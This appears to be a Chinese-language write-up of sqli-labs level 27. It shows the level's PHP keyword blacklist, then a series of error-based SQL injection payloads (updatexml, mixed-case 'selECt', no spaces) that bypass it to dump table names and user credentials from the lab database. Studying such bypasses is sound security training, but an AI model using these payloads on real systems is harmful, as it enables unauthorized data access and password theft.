5.27.第27關 get報錯注入 過濾select和union '閉合

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id);		//Strip out --.
$id= preg_replace('/[#]/',"", $id);			//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/union/s',"", $id);	    //Strip out union
$id= preg_replace('/select/s',"", $id);	    //Strip out select
$id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //Strip out Union
$id= preg_replace('/Select/s',"", $id);	    //Strip out select
return $id;
}

5.27.1手動注入

（1）判斷注入類型、注入點

?id=1'      報錯，判斷為字符型注入，'閉合
?id=1'or'0  返回id=1數據
?id=2'or'0  返回id=2數據，確定為'閉合

（2）查詢數據庫名

?id=1'or(updatexml(1,concat(0x7e,(database())),1))or'0

（3）查詢表名

?id=1'or(updatexml(1,concat(0x7e,(selECt(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))or'0

（4）查詢字段名

?id=1'or(updatexml(1,concat(0x7e,(selECt(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users'))),1))or'0

（5）查詢賬號密碼

?id=1'or(updatexml(1,concat(0x7e,(selECt(substring(group_concat(id,0x7e,username,0x3a,password),1,32))from(users))),1))or'0
?id=1'or(updatexml(1,concat(0x7e,(selECt(substring(group_concat(id,0x7e,username,0x3a,password),32,32))from(users))),1))or'0
?id=1'or(updatexml(1,concat(0x7e,(selECt(substring(group_concat(id,0x7e,username,0x3a,password),63,32))from(users))),1))or'0

1~Dumb:Dumb,2~Angelina:I-kill-you,3~Dummy:p@ssword,4~secure:crppy,5~stupid:stupidity,6~super